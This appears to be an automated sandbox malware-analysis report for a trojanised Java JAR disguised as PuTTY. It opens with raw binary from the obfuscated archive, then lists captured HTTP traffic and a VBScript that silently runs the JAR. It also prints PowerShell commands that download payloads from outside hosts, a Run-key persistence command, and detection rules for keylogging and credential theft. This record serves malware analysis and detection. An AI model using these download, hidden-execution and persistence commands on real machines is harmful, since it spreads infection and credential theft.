²â{­Ä]+~Ċï±RÔ[5¬Ô}+õ¹•j³’÷uû¾?f%ãV<îð$ñn°’mVꎕjuxÔÓl%ƒ—f¹hµ•ºìð«g¯~Ç­d«•¼¢`*®–ˆ_H=ùœ´â×­ø +q؊Ÿs–HÔòK”üäM­Lƒ•8“žrH›pGu‚ka‰TSZ½&ý\ÒÏ-=¤uNݵ¬d‹†õZþ\%ߖÿ@5Rûž•úØJ~ÒÁÞ¶íÿþyK­c“·µüùZ~c“G¬Ä}õ¤®Y©«V⢕º˜ž{ï»®9‰³ZþB%?aû0½DJ Otœríf¤G강Ô:$œ$ñÒsüßï¤Dç*³â‡ÓÏ•-É ºqߗŽ2Ú­íÁÕòKuþ´9•ü–*]tÒ&™ÎÆÄ~ ø£ˆ$â:ÄÇÓýñÇå/Öòëµ[À¶ÿq'ÛyrF¿¯¤e~#֝å‘ü¥Z¾-ꐕøŽ~¾m%ë;ôïWÞKvtf»üå:n§‡ê­äQ£VÍÿørpÌW‰Ñîº N‡´óۜüqäËt~RSûZ›o²m©”ܧw“½ìµ_?q½­ÀÐìäFâDù+忓9ÍVü¨òUꄕúЊßÓ+6kÅNè ÖϞôcÇt¿•hI+¿¯ƒüùøš%Ò.JœÔét]Ã;ʜdz‹9SÆ&mù'•þj¿¼¯|ÕAy-µŽoƒã4Ç·ôŽ«³âgÕ6W»¸ÎJœWnO>ë¤~TÐÑØ«3Ð6¶I}aR—¼ôŽÿG'мå¡ªÎa½âÞ>ù‡³ÝÏeèýôÊ õîum“Üëwoù™{äדòp~Ž;aìäqĘ ^Âyç­R§Cuô=yð|¦ÍêèÛâîuüßÿÍG=‰©ƒ"êc¼ñ‘{ڏLvQ¶ª&F«rÂKÕ
Data received Î+þCñù'}'Ä%??ùó{xòüL<“ïó ÷OF®øéÕ»æ{T•ïƞˆ77Í\žûÖe¿qZ¥|«çü9y@ß±9ý+=/÷ëyzvù°S_ÆϼÐü¦¬Ho\qä[d€]¾ÏOêé‹f}K½~ì“Dµ ½·ïo×ôži_üZï®ÏLvÀ ³3œÓ×ÿåW†Îí=þ ÷¨§Éð¶ú<«ýþΠ;èíôS/L©ë”ßþ`“ù”P×Ù.?{¨ñµÙäînÚÙĖ@_†vH”Í…Fô=CHƒ'“L¤ÿ¤ ûe·'pž¦@*Òâ)2S‰i‚A‚:ÛÄN"#Õt3âíp*~úÜ¡ßAZª¼Xnd³0¡ ¡ð)Ì1æòF¶1ÏÈ}rÅH5 C‘±Ø\,Vâç ¯DX%&¥åDù@©ÌgP^™àLxU•V‡Vn}i¯´é5¬j…Ó–5K$`2;NOæÂ‚¶!Š)l î ”Âw¦²ÙØD(•7 ;¦±5¸“Pß)˜¸‹ 㻳áT6 wœÊw fGÂ̈́ Þ,X"Nc˱…à4Þ"X¦³½¸‡`:ß#X2r6÷ä|¯`Ì`nÜG0ƒï,§³ ÜOp:ß/X*Î`sðÁü€`ièdº :¹[0†3Y ¶œÉ[›Š™¬ Ûfò6AŠYl¶Ìâí‚MÃYl1zÎâÁÒq6«Æƒgóƒ‚qœÃÖaÁ9¼C sY="8—äo6+F/ÁlîlÎc[ñ0Áyü°`NÌaóðÁ~D°™˜Ë ÐG0—ûËÄùl%8Ÿ, °ô\Àý‚’¸JÐIp!ï”ÿ<ք]óx— ÐóÙ.<F0Ÿl.P!º ðnÁ²±ÀÁBäÂ"¶ƒñ `9XdÃBE¼G°\\L8Np1?.Ø|,¦dœ XÌO¶—°n<Ip ?)ØB,¡èO,á§ËÃ¥,O\ÊO –²%ØK°”÷ µŒœ:C°ŒŸ¬Ë©Äg –ó³‚-Bd¥øAäï V„l#ž#XÁÏ raëÅ>‚ËxŸ /§T÷\Îû©¤Ü ¬ä‚•`kÆó«øyÁ–b5…1H°š 2RÎá‚5ü‚`e¸‚íNjWð‹‚•ãJÄ!‚+ù`ˆ«Øj¼Dp¿$X®¦ƒs™àj~Y°eXKa\!X˯:Êuì¾O°Ž¿/X%®¡ê*Á5üª }õT¢Öó©µþ5‚kù5A•^ÇVà‡×ñ דÆG×óUËeÁaB.>,Ø*Ü@Ïæu‚øuAþmd;ðc‚ùǂÕbæø ¡£½`“¸'…¡µ€ÛKq“Ó2ŠwhæN~ê´ðOKñ¾‰2€›ùæaÜBJ|‹Pª[¶Q¼KønÞ&ÆÛ¥x‹oå·pß6ŒÛ¥êvÁí ÐþÓ×·_@EeâC¨«¼éL,pÞ| k‰_«wñúÙS^ëÿ€›6¨Ñ4Ír ÿií_êÅ÷£ð¼o<8õè#et¬v%ÔùdÇË5\Ɔ‚GP”5@-Âbl䛋2Ã&c³B±±åMÏ¢!¯^–ö Tü¶=„mºÑØH"ÁØ!…ÅØ)…ÕØ-…Íh‘Ân앂YýJÚ ·’v£MÉDãd’Ñ¡d²áUÒaQ2Å8ªdªÑÙh:%aWÔ©’äFã˜Ñ=€V B6·0‚Fj„*NëX+<n.ŸP¢@6»ÂÇpÊ8­pÌHoœ¼1ΎËÛ{ãòÖgôËüPK5‘.Z €PKgtWCIlI
Data received Æ%uÂÙ®`$ghåRfuG 0š‹ÃEŒeâ؆ñTK\—p“q"7 àPn4Àa\À$ÆìpÎ0™[0… ÷ªòm¯L‚T™\ô—Én¯MX½ª,° _9äb2)b2)b2q0™40™H~2iòÉDÇD2Ÿ‰$žŠ„ )\ËD²œ‰ÄÌD’ÌD2•‰ÄÊD"2‘D3‘,f")a"±3‘˜|"!L"×1‰ ö“HŸDr½Ÿ` ¯ê%ßz­äF*Þû-g¦ß·³JýPKô"„tèO4PKgtW@IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/llIIllIIlllI.classÅWy@•E÷ž×îAÇW'51wÔÑQQ1Áíªiꈩ•^‘½²¸™‘&š¹¤Y©é]L*—ÜWh±lß3m3o{V_}í}&¿g潗ŏ¾úýÜ{fžygž9çÌ9çûÂ¥£„žä‚A’.‡Ã5ÊårÄ» ô¿ËïPRc‡+ÞvXst«ž:lÄ0›åœçŒw9sfƏ™>+3£ÐF¨A¢¬åjæÄpPlH bÖªá€0HÓ)£jXÆægçÌìàp·3Hhç4G—ɘ­çfçÆ;Æ Y‘™W˜›c#‘Ô>ll1m0mÙèHJÂÂIÂh»†©[èìëȺ¸AûDš4aÿHšÕf‹N~²S¼=•ˆ¥šme°þÙ9م)¡»¤G’–¤U‰"­é(¶ÂASÇÏtÖªÇ4’ŸŸ›››å,Ȳ“« Â;ÿ· G{Åс&dU¶¤cΏ¹J‰¾Jt§C:¬˜LoØÅIg=]zšF÷úؤQ_7­Tb»{©/Aö(ºHÓÎl;e˜š]ÆåfÏɬåƒ^D@Ýñ‰kÚÑqG§tU"A‰ötÜÑÉtØÅ1t⚳¿Ó¹·¤µ0ˆ½†+`1»\{Iì$\ù1Í Òï^ú·>¾%~ŸÛïÛî÷ ~зƗ\6ÙN†ü/fµd{ª²¾Ï6¿·6Ô{y–hæaõ3{ÁyüOØ.û”û}[üîJõ Œ”ù½ëíÄQ³Çí÷n®YëÙìŸðûîò»ù½Çê{Ž)6¬òíÖŒ”ÙÉÈz˜½îB¸ïðû°öa%¡Œõ=è÷ÔÕå=Ž¼ìäÚú˜kÚr5Ù[ê÷mòûÖû=Ío9s—ß·Y úVh ®ö»½ÊßA¿§ÂïÞi'cêg†žÞ#~ÏqÕ¯1|‡ßw¤º«?劓ÝwêñÇý>0­ïKµÔš{`é#~*uç¬Úrˆåðµ~Ïr5ÙWi'ãÿg<ßî÷ÒçUæ÷müÓðð¬Ñåڇ˭ìdÂ_dŠòƝ:¤Oh’ʺ¶C;v¹>kq…îÁ*;™ø7˜AµÒïÙ\7)ô.¾~ï>¿÷¨všà#¸ñ¸Lúkf¥çÒ ?+üž»uгҳJçÔµ…ûHÀ->Äó”¿`Æ*x[yCgx¼·×IOBËõÓíÁì~Pë|c€Y•”@Ê×ÍGØXª‚Vi~‡†Š:ñX[×ñ–k?OUÌÞ½ÊR2Ô[—Ù­òvW {WàøÜ»ÕP¶/Ñæ,ó»é}á´CvâÔ:—O§ìòºTC[+÷¡|À¢-A§m×æ€y>ˆƒv’ôsiМZñ>¢JA5Úl«km´<ØY¦ÂÏ*Új#èœIc]s€NN:ý<ÞÅ®ü¼œéùYNgƂâ¹7ÛI¶Aü/·ºþºld6ˆÕ¼ÀÅB ן¼O‘dɉ .’|cf»âÇ9sfäα‘¹¡Ë=—~¢ÐsÞ !GXïߢ’OæĖ“¹ Ð‘S¨ßî`Z@ª'Å´ãݯ Þ*ôv2+?w¾sº+ÓFnŃj£ªµvЅK¿Ÿæïx±œ|;>”¶›8±m³Ê_LûìYþ3%M¶(‘¥Ä"JŒ˜_iNJ›é4}ßØ0õ{ŠÆ½pa€•èA;·ûl!ý1|7%të:ѯE!Í)_[F‹¦~£„¡§ó/ Ã~¹´Ä ±5 C·Ì™N× ŒŒÌ‚‚Z÷Md3îíªšäÒô‡z­£3œëfÐN†n !xÐíÒÐó´¿AÒiÖ9ãJƒD$&$$&$%õIL´“‡ Ò¤Ö9…™33óm¤ ׆<g~A&F"É#ê8&ÒVãl;pjú-g—‹ö<{Ó:Úíú‚wé܏úEÒø÷7>CÞÎ8D‹N8E ïéJç­9¹R‰uJ,£}S~§®Šô‹4qÏâÉtĬ%¿Ð™Ë­W¢T‰-4·ùÑ¡tBFÑRêHŸþý“ó< ë½D%â”H¡gŽŽW.è@ã;ôK;ì»D¨ó©9£èü# %tÈÔ¾÷*±Z‰M4­7ÝCÇ|_ڌ ÿí"ÍøæôfuµÂYÇ,²yç)©Ž.õÝV텹V_Ån}S"ÉÛä´rÖ;˜<3³0uaafŠÓ.SR#ÉYònI%ï¤Á”TùÀ m5Cî¹YÊ߅ Bœ;óg¤Y¸ÀFÎáÎ:Aš(p3õ_ ±õyâ'‘ ÒüùL+e>Uª|ëÓrs °iaºÓU” ]Órg ‰‚"³¯uæI•$¤-nˆ!¸Ü7 áêâKþـqD? 2‚4ē/ñ ;fÛñ[`«ÙÈl¼Ÿ4iYRR"l¦ÉmhX쀘VÛÈÏfS Fˆ²¸ÍfÖ@¸á¡n#Úäz $żBw¸ÍlŽN–Ùr·åa ZuKÌ4ÛH¨QyŒDM*'WVr³±Ö ³ÖÅܶ`ÉNõãD(­7Þ׿mÌéð¾%hۛm4y‰0cuo¢Ù60rN±™íÊIÇJ³SP…ÎZ….5*ÄY*tÕ*„•‘(³›µ¾j¸Ù]÷‚J™WIâ5IB I¢EÒ£†$)@B͞’Þ•fŸ I_M’\CÒÏ"é¯ILs@ÝÍS4¤)æ@Ýi½ §5šã? ½¯à‹"ªÈb7ð«Oÿ–#U¤›††‡ÙHT6¾øa5ßøV© P3 =¥kxiT›¢Ö€5©wi\›ë¯!­¬Ð!¯#tlhËY“$õ¼Ÿ ¦æÐñhBÌ᪠5G¨&Ì¥›9Z5vó:Õ°0sœnm¦Ô­ÝL×m¸y½n#ÌɺmhÞ ÛHó&ÝF™ÓtÛȜ®ÛÆæ Ý2óæñæL3˜u˜ä!ˆÃŽ‘üIÍHA9™ˆÜ’b.âa%­K&ûˆþ«Ô&)_ډñ Ùk#‹aÞmÁÌ0ZæÃÍ%æíÁÌ3K@#˜™á!ŸšwX°Xg†46—ꁐ”22Ä\¦û<̼,s9$´ÈÃ@©ê–˜+Шã_©'V‡Í]–‘gÌUA†»5Ãê†5ÃZÍP;›Âj²),˜M1*›Æ^øè;´W§OœÔDeS­ŒYØ0¼G÷&šë##Í AîÕ*l¬Qá>K…ûF<0b3ôØRi>¨!bx«îè.!{ðŒáq*"û›‘V¸…khE_\íÆqŠ—­: {‡UáølV„Zc-«´¡¨„t1·™î7ªk9ñ˜^`úÌíæŽÃdg‰»ô˜ádwuyL ”GŸ¹Ç|¬¦<îµÊ_‚‚sŸûê ØNbÍýÖ@÷@yli”Ç2²Ò<, ë¢p¨¦(”[Eáp (©[LŽªÌqóXá¸f8QÃPa1TÖÔ¦'«
Data received lIlIlIIllI/IllIlIlIllIlIlIl.classPKgtWØ ÞÌ U!CiÛIlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IlIllIlllllllII.classPKgtW—¸ž¡U'I¦èIlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IlIllIlIIlIlIIIlllIll.classPKgtWHlwÀ“!@¾ýIlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/llllllllIIll.classPKgtW@¥ùp•¢F¿ IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IllIIllIIllIlllIIl.classPKgtWj‹³0wAÈ IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/lIIlllllIIIll.classPKgtWn%N HV" IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IIllIIlIIllllIIlllII.classPKgtW)S~!nEI' IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IlllIIllIlIIllIIIIllI.classPKgtWËÂȌC: CI IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/llIllllIIlIlllI.classPKgtWvÙI¦CÃM IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IIIlllIIlllIIII.classPKgtW™Rš¨ã…H6S IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IIIlIIlIIIIIlIIlIIII.classPKgtWžéðZNV<BT IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/llIllIllIIlIll.classPKgtWKeÒDª-CMo IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IlIlIlIIlIIIlll.classPKgtW⠘wxH… IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/lIIIllIlllllIIIlIIIl.classPKgtW‘T£;&±ND IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/lIlIIlllllIllIIl.classPKgtW¸$’iÖ áE´³ IlIIlLllI/lllIlIlIlll/IIlllllIlIIl/lIlIlIIllI/IlIIlllIIlIlIIlIl.classPKgtWY*žõðý¾ chat.pngPKgtW˜ÄÐ=Ke(Á META-INF/MANIFEST.MFPKgtW•;hތ µÁ checksumPKgtW_qf.a.wà rbBUgJMftidmzDqGDBpgxByDtjVtQVWSQxJWgieCJh/wyNfohYLyyNmoUfPLtJzxlWyslzaPQxTrNeDgvdqkXdquPKSBlxkcCiPOfXBRdypLVIqk/OMDXXPFIXqawBBLxGrzUCBroJHPTGsEIJgqXySpgYLvhqdmxR/fMxBbHYYnjSOrynOjMcUmhtxwXohIdpWnsHMWefLSNtenyNySX/OgLnwkWABCtPVCSGdFBzEZaNKXbYo/fHblRyjpDDpNxppQkqpdhsIEiFLXBcr/iKFCkpbiPMyeYYeooRIHsuxUGoYbSOGejFUfCeWanppPsusZsEeOeLKiOtbzqeOlxwtc/XXVjCtGhZraIIjVHvAnnASiGVCYxsTGYvabWrURyMWbRfAEyWhWojgaKOobkBbbfTRQFhJcrsK/QDHpALiUpydzolqFQLCdhduDPRhyhpwGVvmWBsDCqF/TAVhoagwVhsOpkbdZLqaSSLfWXw/VaFmdCfOluSZnXWTBCAWHRJrsbajDswgTfqplDJnnyjn.classPK††-=(ô
Data received HTTP/1.1 200 OK Date: Thu, 14 Dec 2023 01:12:29 GMT Server: nginx/1.21.6 Content-Type: text/vbscript Content-Length: 187 Last-Modified: Mon, 11 Dec 2023 05:44:49 GMT X-Server-Cache: true X-Proxy-Cache: EXPIRED Accept-Ranges: bytes Set WshShell = CreateObject("WScript.Shell") WshShell.Run "cmd /c java -jar """ & WshShell.ExpandEnvironmentStrings("%TEMP%\PuttyDownload\putty.jar"""), 0, False Set WshShell = Nothing
Data sent GET /s/putty.jar HTTP/1.1 Host: eusketxe.com Connection: Keep-Alive
Data sent GET /fs/fs/run_hidden.vbs HTTP/1.1 Host: brahmacouncil.com Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
cmdline REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Home /d "C:\Program Files (x86)\Java\jre1.8.0_131\bin\javaw.exe -jar C:\Users\test22\AppData\Roaming\Microsoft\.tmp\1702534343114.tmp" /f
cmdline cmd.exe /c "REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Home /d "C:\Program Files (x86)\Java\jre1.8.0_131\bin\javaw.exe -jar C:\Users\test22\AppData\Roaming\Microsoft\.tmp\1702534343114.tmp" /f"
host 154.127.53.176
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Home reg_value C:\Program Files (x86)\Java\jre1.8.0_131\bin\javaw.exe -jar C:\Users\test22\AppData\Roaming\Microsoft\.tmp\1702534343114.tmp
parent_process cscript.exe martian_process cmd /c java -jar "C:\Users\test22\AppData\Local\Temp\PuttyDownload\putty.jar"
Time & API Arguments Status Return Repeated

send

buffer: GET /s/putty.jar HTTP/1.1 Host: eusketxe.com Connection: Keep-Alive
socket: 1424
sent: 73
1 73 0

send

buffer: GET /fs/fs/run_hidden.vbs HTTP/1.1 Host: brahmacouncil.com Connection: Keep-Alive
socket: 1424
sent: 87
1 87 0
cmd cmd /c java -jar "c:\users\test22\appdata\local\temp\puttydownload\putty.jar""c:\windows\system32\cmd.exe" /c java -jar "c:\users\test22\appdata\local\temp\puttydownload\putty.jar"cscript //nologo ""c:\users\test22\appdata\local\temp\puttydownload\run_hidden.vbs""reg add hkey_current_user\software\microsoft\windows\currentversion\run /v home /d "c:\program files (x86)\java\jre1.8.0_131\bin\javaw.exe -jar c:\users\test22\appdata\roaming\microsoft\.tmp\1702534343114.tmp" /fpowershell -command "(new-object system.net.webclient).downloadfile('http://eusketxe.com/s/putty.jar', 'c:\users\test22\appdata\local\temp\puttydownload\putty.jar')"cmd.exe /c "reg add hkey_current_user\software\microsoft\windows\currentversion\run /v home /d "c:\program files (x86)\java\jre1.8.0_131\bin\javaw.exe -jar c:\users\test22\appdata\roaming\microsoft\.tmp\1702534343114.tmp" /f"powershell -command "(new-object system.net.webclient).downloadfile('http://brahmacouncil.com/fs/fs/run_hidden.vbs', 'c:\users\test22\appdata\local\temp\puttydownload\run_hidden.vbs')"java -jar "c:\users\test22\appdata\local\temp\puttydownload\putty.jar"
parent_process cscript.exe martian_process cmd /c java -jar "C:\Users\test22\AppData\Local\Temp\PuttyDownload\putty.jar"
parent_process cscript.exe martian_process "C:\Windows\System32\cmd.exe" /c java -jar "C:\Users\test22\AppData\Local\Temp\PuttyDownload\putty.jar"
value Uses powershell to execute a file download from the command line
value Uses powershell to execute a file download from the command line